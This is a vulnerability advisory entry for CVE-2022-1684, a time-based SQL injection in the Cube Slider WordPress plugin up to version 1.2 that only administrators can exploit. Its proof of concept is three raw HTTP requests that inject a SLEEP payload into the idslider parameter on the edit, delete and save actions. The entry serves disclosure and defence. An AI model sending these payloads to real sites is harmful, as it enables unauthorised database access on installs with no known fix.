WordPress Plugin Vulnerabilities

Cube Slider <= 1.2 - Admin+ SQLi

Description

The plugin does not sanitise and escape the idslider parameter before using it in various SQL queries, leading to SQL Injections exploitable by high privileged users such as admin

Proof of Concept

------------------
# Request 1 (Edit)
------------------
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details

--------------------
# Request 2 (Delete
--------------------
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4

-----
# Request 3 (Save)
--------------------
POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

idslider=6+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes

Affects Plugins

Plugin icon
cube-slider
No known fix

References

CVE
CVE-2022-1684
URL
https://bulletin.iese.de/post/cube-slider_1-2

Classification

Type
SQLI
OWASP top 10
A1: Injection
CWE
CWE-89
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
Daniel Krohmer (Fraunhofer IESE, Germany), Shi Chen (University of Kaiserslautern, Germany)
Submitter
Daniel Krohmer
Submitter website
https://iese.fraunhofer.de/en.html
Verified
Yes
WPVDB ID
db7fb815-945a-41c7-8932-834cc646a806

Timeline

Publicly Published
2022-05-09 (about 2 years ago)
Added
2022-05-12 (about 2 years ago)
Last Updated
2022-05-13 (about 2 years ago)

Other

Published
Title
Published
2015-03-17
Title
Gravity Forms 1.8 <= 1.9.3.5 - Authenticated Blind SQL Injection
Published
2020-11-08
Title
Abandoned Cart Lite for WooCommerce < 5.8.3 - Unauthenticated SQL Injection
Published
2022-01-04
Title
Futurio Extra < 1.6.3 - Authenticated SQL Injection
Published
2024-03-26
Title
Zoho Campaigns < 2.0.7 - Authenticated (Contributor+) SQL Injection
Published
2017-06-04
Title
Event List <= 0.7.8 - Authenticated SQL Injection